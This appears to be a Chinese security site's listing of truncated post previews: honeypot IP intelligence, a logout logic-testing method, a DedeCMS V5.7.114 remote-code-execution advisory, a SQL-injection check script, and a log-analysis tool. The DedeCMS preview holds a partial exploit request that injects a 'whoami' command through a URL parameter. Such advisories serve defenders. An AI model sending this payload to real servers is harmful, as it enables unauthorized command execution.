秃兔
【2025你懂的】第三十一期情报 蜜罐陷阱IP
IP类别地理位置112.126.77.215蜜罐陷阱IP中国 北京120.25.189.254蜜罐陷阱IP中国 广东 深圳47.243.124.21蜜罐陷阱IP中国 香港156.244.11.6蜜罐陷阱IP沙特阿拉伯47.119.22.156蜜罐陷阱IP中国 广...
【渗透文库】注销场景业务逻辑测试
测试描述:通过抓包工具分析注销场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 业务场景...
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞
GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
捷诚管理信息系统 SQL注入漏洞
import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容
紫兔网络安全流量日志自动化分析研判
2025 基于只能分析BT日志的紫兔BT日志分析V1重构紫兔网络安全流量日志自动化分析研判V2 V3版本完成火山引擎的Deepseek-R1接入 + 增加实时可视化图表(饼图+曲线图) + 在原有规则基础上增加 31 ...
